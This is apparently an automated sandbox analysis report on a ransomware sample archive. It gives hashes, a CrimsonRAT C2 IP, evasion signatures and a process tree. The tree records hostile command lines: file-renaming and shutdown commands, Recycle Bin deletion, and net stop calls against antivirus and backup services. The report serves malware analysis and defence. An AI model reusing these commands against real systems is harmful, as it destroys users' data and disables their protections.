Analysis
-
max time kernel
59s -
max time network
78s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
31-10-2024 20:49
Static task
static1
General
-
Target
RNSM00398.7z
-
Size
35.6MB
-
MD5
3b49730191d772ce76f948b1df95b031
-
SHA1
7d52bb20e716d41b4dcaa71d76b23425a6dfd260
-
SHA256
a1941a5b8cdbf7cd067ee8c9005c6d8ee3b83c5b6aa8d11328596488ca158c84
-
SHA512
19b7f11784844562eff25c2d68e9a44ab071d064ce15ebe86592d918bcc3eb55a0c584d345842a7f5357914beb8d39d726528f9d79f2773bfebf86726caf640f
-
SSDEEP
786432:2x/uG7WdVIu/Dwno4l2xVPtp+yxk3DX2m99a73uw2HK13W2n:2x/XUIu/DSUxVP7+yGam907+RHK9
Malware Config
Extracted
crimsonrat
66.154.113.38
Signatures
-
CrimsonRAT main payload 1 IoCs
resource yara_rule behavioral1/files/0x000600000001e513-226.dat family_crimsonrat -
CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
-
Crimsonrat family
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe -
Executes dropped EXE 5 IoCs
pid Process 4308 HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exe 3580 HEUR-Trojan-Ransom.MSIL.Encoder.gen-39d4d4591d7dc4242d23460417568b7da1b6efd62e9dcd3b409a3922dad37b78.exe 2912 HEUR-Trojan-Ransom.MSIL.Foreign.gen-4075ae09b2cad5580286fb104acdbc0bfff1168e1f49057049807af7ec11957e.exe 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 3952 HEUR-Trojan-Ransom.Win32.Agent.gen-7985a06e0d0741623d33531ed7f20a60eb47efba0d04ea1232d132ae6fc902cf.exe -
Loads dropped DLL 1 IoCs
pid Process 4308 HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exe -
Modifies file permissions 1 TTPs 3 IoCs
pid Process 7268 icacls.exe 7260 icacls.exe 7252 icacls.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/files/0x0009000000023cac-104.dat agile_net -
resource yara_rule behavioral1/files/0x0007000000023cc7-191.dat themida behavioral1/files/0x0007000000023cc6-190.dat themida -
resource yara_rule behavioral1/files/0x0007000000023cbc-180.dat vmprotect -
resource yara_rule behavioral1/files/0x0007000000023cc4-188.dat upx behavioral1/files/0x0007000000023cbb-179.dat upx -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 6828 sc.exe 6820 sc.exe 6812 sc.exe 6804 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Agent.gen-7985a06e0d0741623d33531ed7f20a60eb47efba0d04ea1232d132ae6fc902cf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Encoder.gen-39d4d4591d7dc4242d23460417568b7da1b6efd62e9dcd3b409a3922dad37b78.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Kills process with taskkill 47 IoCs
pid Process 7184 taskkill.exe 544 taskkill.exe 7124 taskkill.exe 7020 taskkill.exe 6924 taskkill.exe 6916 taskkill.exe 6900 taskkill.exe 7192 taskkill.exe 6868 taskkill.exe 6876 taskkill.exe 7100 taskkill.exe 7084 taskkill.exe 6956 taskkill.exe 6936 taskkill.exe 6908 taskkill.exe 1496 taskkill.exe 7076 taskkill.exe 7048 taskkill.exe 7036 taskkill.exe 6844 taskkill.exe 5160 taskkill.exe 6884 taskkill.exe 6836 taskkill.exe 7108 taskkill.exe 7132 taskkill.exe 7116 taskkill.exe 7028 taskkill.exe 7012 taskkill.exe 6980 taskkill.exe 6944 taskkill.exe 7144 taskkill.exe 7200 taskkill.exe 7164 taskkill.exe 7092 taskkill.exe 6996 taskkill.exe 6860 taskkill.exe 7208 taskkill.exe 6892 taskkill.exe 7152 taskkill.exe 7068 taskkill.exe 7056 taskkill.exe 7004 taskkill.exe 6988 taskkill.exe 6972 taskkill.exe 6964 taskkill.exe 6852 taskkill.exe 7176 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 1468 powershell.exe 1468 powershell.exe 1468 powershell.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 552 7zFM.exe 4540 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeRestorePrivilege 552 7zFM.exe Token: 35 552 7zFM.exe Token: SeSecurityPrivilege 552 7zFM.exe Token: SeDebugPrivilege 1552 taskmgr.exe Token: SeSystemProfilePrivilege 1552 taskmgr.exe Token: SeCreateGlobalPrivilege 1552 taskmgr.exe Token: SeDebugPrivilege 4540 taskmgr.exe Token: SeSystemProfilePrivilege 4540 taskmgr.exe Token: SeCreateGlobalPrivilege 4540 taskmgr.exe Token: 33 1552 taskmgr.exe Token: SeIncBasePriorityPrivilege 1552 taskmgr.exe Token: SeDebugPrivilege 1468 powershell.exe Token: SeDebugPrivilege 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 552 7zFM.exe 552 7zFM.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 1552 taskmgr.exe 1552 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe 4540 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1552 wrote to memory of 4540 1552 taskmgr.exe 95 PID 1552 wrote to memory of 4540 1552 taskmgr.exe 95 PID 1468 wrote to memory of 2244 1468 powershell.exe 102 PID 1468 wrote to memory of 2244 1468 powershell.exe 102 PID 2244 wrote to memory of 4308 2244 cmd.exe 104 PID 2244 wrote to memory of 4308 2244 cmd.exe 104 PID 2244 wrote to memory of 3580 2244 cmd.exe 105 PID 2244 wrote to memory of 3580 2244 cmd.exe 105 PID 2244 wrote to memory of 3580 2244 cmd.exe 105 PID 2244 wrote to memory of 2912 2244 cmd.exe 106 PID 2244 wrote to memory of 2912 2244 cmd.exe 106 PID 2244 wrote to memory of 4884 2244 cmd.exe 107 PID 2244 wrote to memory of 4884 2244 cmd.exe 107 PID 2244 wrote to memory of 4884 2244 cmd.exe 107 PID 2244 wrote to memory of 3952 2244 cmd.exe 108 PID 2244 wrote to memory of 3952 2244 cmd.exe 108 PID 2244 wrote to memory of 3952 2244 cmd.exe 108 PID 4884 wrote to memory of 1876 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 109 PID 4884 wrote to memory of 1876 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 109 PID 4884 wrote to memory of 1876 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 109 PID 4884 wrote to memory of 4312 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 111 PID 4884 wrote to memory of 4312 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 111 PID 4884 wrote to memory of 4312 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 111 PID 4884 wrote to memory of 4952 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 112 PID 4884 wrote to memory of 4952 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 112 PID 4884 wrote to memory of 4952 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 112 PID 4884 wrote to memory of 4172 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 113 PID 4884 wrote to memory of 4172 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 113 PID 4884 wrote to memory of 4172 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 113 PID 4884 wrote to memory of 3356 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 114 PID 4884 wrote to memory of 3356 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 114 PID 4884 wrote to memory of 3356 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 114 PID 4884 wrote to memory of 4608 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 115 PID 4884 wrote to memory of 4608 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 115 PID 4884 wrote to memory of 4608 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 115 PID 4884 wrote to memory of 3144 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 116 PID 4884 wrote to memory of 3144 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 116 PID 4884 wrote to memory of 3144 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 116 PID 4884 wrote to memory of 1464 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 117 PID 4884 wrote to memory of 1464 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 117 PID 4884 wrote to memory of 1464 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 117 PID 4884 wrote to memory of 2856 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 118 PID 4884 wrote to memory of 2856 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 118 PID 4884 wrote to memory of 2856 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 118 PID 4884 wrote to memory of 5092 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 119 PID 4884 wrote to memory of 5092 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 119 PID 4884 wrote to memory of 5092 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 119 PID 4884 wrote to memory of 4336 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 120 PID 4884 wrote to memory of 4336 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 120 PID 4884 wrote to memory of 4336 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 120 PID 4884 wrote to memory of 4776 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 121 PID 4884 wrote to memory of 4776 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 121 PID 4884 wrote to memory of 4776 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 121 PID 4884 wrote to memory of 3812 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 122 PID 4884 wrote to memory of 3812 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 122 PID 4884 wrote to memory of 3812 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 122 PID 4884 wrote to memory of 4748 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 123 PID 4884 wrote to memory of 4748 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 123 PID 4884 wrote to memory of 4748 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 123 PID 4884 wrote to memory of 1732 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 124 PID 4884 wrote to memory of 1732 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 124 PID 4884 wrote to memory of 1732 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 124 PID 4884 wrote to memory of 4552 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 125 PID 4884 wrote to memory of 4552 4884 HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe 125
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00398.7z"1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:552
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /12⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-5bc1aa76792901dce26683075941887a08bd4bafae6ad99edae15368aff2b598.exe3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
PID:4308
-
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.MSIL.Encoder.gen-39d4d4591d7dc4242d23460417568b7da1b6efd62e9dcd3b409a3922dad37b78.exeHEUR-Trojan-Ransom.MSIL.Encoder.gen-39d4d4591d7dc4242d23460417568b7da1b6efd62e9dcd3b409a3922dad37b78.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3580 -
C:\Windows\SysWOW64\shutdown.exe"C:\Windows\System32\shutdown.exe" -s /t 34⤵PID:16268
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ren C:\Users\%USERNAME%\Desktop\*.* *.%random%4⤵PID:18584
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ren C:\Users\%USERNAME%\Downloads\*.* *.%random%4⤵PID:19236
-
-
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.MSIL.Foreign.gen-4075ae09b2cad5580286fb104acdbc0bfff1168e1f49057049807af7ec11957e.exeHEUR-Trojan-Ransom.MSIL.Foreign.gen-4075ae09b2cad5580286fb104acdbc0bfff1168e1f49057049807af7ec11957e.exe3⤵
- Executes dropped EXE
PID:2912 -
C:\ProgramData\Dhonvdh\ithmrdrvas.exe"C:\ProgramData\Dhonvdh\ithmrdrvas.exe"4⤵PID:19300
-
-
-
C:\Users\Admin\Desktop\00398\HEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exeHEUR-Trojan-Ransom.MSIL.Thanos.gen-2890b870ef899b619a841b085f6997d35b092315c65283c49e0f1cc6eb0b74f7.exe3⤵
- Drops startup file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin4⤵PID:1876
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y4⤵PID:4312
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y5⤵PID:12048
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y4⤵PID:4952
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y5⤵PID:12316
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y4⤵PID:4172
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y5⤵PID:13448
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y4⤵PID:3356
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y5⤵PID:15584
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y4⤵PID:4608
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y5⤵PID:12308
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y4⤵PID:3144
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y5⤵PID:15564
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y4⤵PID:1464
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y5⤵PID:13440
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y4⤵PID:2856
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y5⤵PID:13456
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y4⤵PID:5092
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y5⤵PID:13432
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y4⤵PID:4336
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y5⤵PID:14528
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y4⤵PID:4776
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y5⤵PID:16376
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y4⤵PID:3812
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y5⤵PID:15820
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y4⤵PID:4748
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y5⤵PID:15972
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y4⤵PID:1732
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y5⤵PID:15444
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y4⤵PID:4552
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y5⤵PID:14892
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y4⤵PID:4680
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y5⤵PID:14868
-
-
-
